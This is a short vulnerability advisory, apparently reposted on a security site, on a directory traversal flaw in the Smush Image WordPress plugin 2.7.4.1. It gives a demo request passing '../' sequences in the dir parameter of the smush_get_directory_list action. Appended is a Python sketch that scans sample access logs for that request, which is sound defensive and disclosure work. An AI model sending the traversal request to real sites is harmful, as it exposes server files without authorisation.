Class File traversal
Remote Yes
Credit Ricardo Sanchez
The Smush Image WordPress plugin is prone to a file traversal vulnerability
because it fails to sufficiently protect folder privacy.
To exploit this issue, use the following steps:
Demo URL:
http://localhost/wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx
Confirm:
https://wordpress.org/support/topic/file-transversal-bug/#post-9554401
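A detection sketch for the request shape in the demo URL, added here as an example and not taken from the advisory or the plugin: it scans web access logs for `admin-ajax.php` requests with `action=smush_get_directory_list` whose `dir` value contains `..` path segments, including percent-encoded and double-encoded forms. The log lines are constructed samples and the function names are hypothetical.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2017:13:55:36 +0000] "GET /wordpress/wp-admin/admin-ajax.php?dir=../../../../../../&multiSelect=true&action=smush_get_directory_list&list_nonce=xxxxxxx HTTP/1.1" 200 512 "-" "curl/7.55"
203.0.113.5 - - [10/Oct/2017:13:55:40 +0000] "GET /wordpress/wp-admin/admin-ajax.php?dir=%252e%252e%252f%252e%252e%252f&action=smush_get_directory_list&list_nonce=xxxxxxx HTTP/1.1" 200 498 "-" "curl/7.55"
198.51.100.7 - - [10/Oct/2017:13:56:01 +0000] "GET /wordpress/wp-admin/admin-ajax.php?dir=wp-content/uploads/2017/&action=smush_get_directory_list&list_nonce=xxxxxxx HTTP/1.1" 200 301 "-" "Mozilla/5.0"
198.51.100.7 - - [10/Oct/2017:13:56:09 +0000] "GET /wordpress/wp-admin/admin-ajax.php?action=heartbeat&dir=../ HTTP/1.1" 200 20 "-" "Mozilla/5.0"
"""

# client IP, request target and status code from a combined-format line
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')

def fully_decode(value, max_rounds=5):
    """Percent-decode repeatedly so double-encoded '..' is not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def has_traversal(dir_value):
    """True if any path segment is '..' (forward or back slashes)."""
    parts = re.split(r"[\\/]+", fully_decode(dir_value))
    return ".." in parts

def find_traversal_requests(log_text):
    """Return (client, status, decoded dir) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/wp-admin/admin-ajax.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        if "smush_get_directory_list" not in params.get("action", []):
            continue
        bad = [d for d in params.get("dir", []) if has_traversal(d)]
        if bad:
            hits.append((client, int(status), fully_decode(bad[0])))
    return hits

if __name__ == "__main__":
    for hit in find_traversal_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so the same parameters sent in a POST body would need request-body logging or a WAF rule to be seen.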
WordPress Smush Image 2.7.4.1 Directory Traversal
- Written by: khalil shreateh
- Category: Vulnerabilities